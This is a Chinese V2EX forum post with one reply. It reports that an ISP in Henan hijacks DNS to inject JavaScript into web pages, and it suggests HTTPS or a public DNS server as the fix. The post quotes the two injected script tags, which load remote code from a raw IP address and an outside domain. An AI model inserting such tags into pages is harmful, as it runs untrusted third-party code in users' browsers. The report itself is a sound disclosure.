河南联通 DNS 劫持。

2019-10-12 10:57:12 +08:00
 zhensjoke

**解决方法:**网站更换 https,或者修改电脑 DNS 为非运营商 DNS,如:119.29.29.29 8.8.8.8
早上帮人调试某个网页的时候,发现页面内多了几个 JS,检查后发现不是网站内调用,而是本地 DNS 劫持。

劫持会在网页 head 末尾处以下代码

<script src="http://47.103.72.172:10028/js/k.js?FKFN=Z"></script>

<script src="https://s.duoroumao.cn/yxs199.js"></script>=

插入之后页面会向优酷、淘宝和拼多多的 APP 发送信息

淘宝:

优酷:

拼多多:

不知道具体什么利益关系,真 TM 不要脸!

1865 次点击
所在节点    宽带症候群
1 条回复
wwbfred
2019-10-14 10:21:14 +08:00
联通是宽带还是蜂窝?两年前北京联通的蜂窝都存在 http 注入,更别说其他地方了.
要是宽带的话就过分了,我上次见宽带的注入感觉都有 10 多年了...

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/608521

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX